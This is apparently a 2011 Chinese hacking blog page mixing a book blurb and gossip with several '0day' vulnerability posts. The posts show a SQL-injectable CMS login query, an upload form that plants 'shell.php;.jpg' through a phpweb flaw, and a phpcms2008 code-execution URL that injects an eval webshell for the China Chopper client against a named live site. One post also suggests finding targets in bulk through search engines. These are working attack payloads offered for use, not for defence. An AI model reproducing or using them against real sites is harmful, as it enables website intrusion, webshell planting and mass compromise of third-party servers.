Alright Bring it on!Let blizzards come more violen.

feed订阅 你好,欢迎光临! 

老D博客

代码之美+浪潮之巅+数学之美(完整版)

2011.12.31 , 娱乐八卦 , 2 Comments ,

浪潮之巅网上多是不完整版的 这里放个完整版的

内容简介
  近一百多年来,总有一些公司很幸运地、有意识或无意识地站在技术革命的浪尖之上。在这十几年间,它们代表着科技的浪潮,直到下一波浪潮的来临。
  从一百年前算起,AT&T 公司、IBM 公司、苹果公司、英特尔公司、微软公司、思科公司、雅虎公司和Google公司都先后被幸运地推到了浪尖。虽然,它们来自不同的领域,中间有些已经衰落或正在衰落,但是它们都极度辉煌过。本书系统地介绍了这些公司成功的本质原因及科技工业一百多年的发展。
  在极度商业化的今天,科技的进步和商机是分不开的。因此,本书也系统地介绍了影响到科技浪潮的风险投资公司,诸如 KPCB 和红杉资本,以及百年来为科技捧场的投资银行,例如高盛公司,等等。
  在这些公司兴衰的背后,有着它必然的规律。本书不仅讲述科技工业的历史,更重在揭示它的规律性。

Google黑板报

Tags: , , ,

126cms后台登陆注入漏洞

2011.11.26 , 漏洞0day , 1 Comment ,

看代码

……若干……
if( !$postdb["userid"] || !$postdb["pwd"] )
{
 echo "<div align=\"center\" class=\"style1\">";
 echo "您输入的用户名或密码有误!!!";
 echo "</div>";
 exit;
}
 
$postdb["pwd"]=md5($postdb["pwd"]);
 
 
        $query="SELECT * FROM `w6_admin` WHERE `userid` ='".$postdb["userid"]."'"; //你懂的
 
          $result=mysql_query($query) or die("Could not connect: " . mysql_error());
 
        $num = mysql_num_rows($result);
 
        if( $num == 0 )
        {
         echo "<div align=\"center\" class=\"style1\">";
         echo "您输入的用户名或密码有误!!!";
         echo "</div>";
         exit;
        }
 
        $_pwd        =  stripslashes(mysql_result($result,"0","pwd"));
        $gptype        =  stripslashes(mysql_result($result,"0","gptype"));
        $adminid        =  stripslashes(mysql_result($result,"0","id"));
        ……若干……
Tags: , ,

万网被黑

2011.11.20 , 娱乐八卦 , 1 Comment ,

http://vip.www.net.cn/555.html

http://zixun.www.net.cn/555.txt(这个已被删除,本来想截张图的,刷新一下就没了)

黑页

现在的黑客伤不起啊

Tags: , ,

GoCDKEY游戏推广系统上传漏洞

2011.11.19 , 漏洞0day , No Comments ,

因需要下了源码看了下
出现在\inc\img_save.asp 文件

Tags: ,

phpweb解析不当加上传漏洞

2011.11.19 , 漏洞0day , No Comments ,

漏洞详情简要描述:新版的phpweb 存在这上传和解析不当漏洞
详细说明:

1
2
3

    <input type="hidden" name="filepath" value="Account/adminindex/1.asp;"/>
 
    <input type="hidden" name="filelx" value="jpg"/>

漏洞证明:exp 上传shell.php.jpg

1
2
3
4
5
6
7
8
9
10
11

<form name=”uploadForm” style=”margin:0;padding:0;” method=”post” enctype=”multipart/form-data” action=”http://xxxxx.com/maq/upload.php”>
 
<input type=”hidden” name=”fileName” id=”fileName” value=”shell.php;.jpg” />
 
<input type=”hidden” name=”attachPath” id=”fileName” value=”maq/pics//>
 
<input type=file” name=”fileData” id=”imgFile” size=14″ style=”border:1px solid #555555;”/>

<input type=”submit” name=”button” id=”KE_IMAGEsubmitButton” value=”上传” style=”border:1px solid #555555;background-color:#AAAAAA;” />

</form>
Tags: , ,

phpcms2008代码执行 批量getshell EXP

2011.11.1 , 漏洞0day , 3 Comments ,

作者:黑小子

原文链接:http://www.heixiaozi.com/archives/114.html

玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧
原文:[url]http://www.wooyun.org/bug.php?action=view&id=2984[/url]

测试如下:
[url]http://www.90sec.org/yp/product.php?pagesize=[/url]${@phpinfo()}
测试结果:[url]http://www.cnqiyou.com/yp/product.php?pagesize=[/url]${@phpinfo()}

EXP:[url]http://www.cnqiyou.com/yp/product.php?pagesize=[/url]${${@eval%28$_POST[heixiaozi]%29}}
直接菜刀链接

批量EXP:
PS:根据百度搜索批量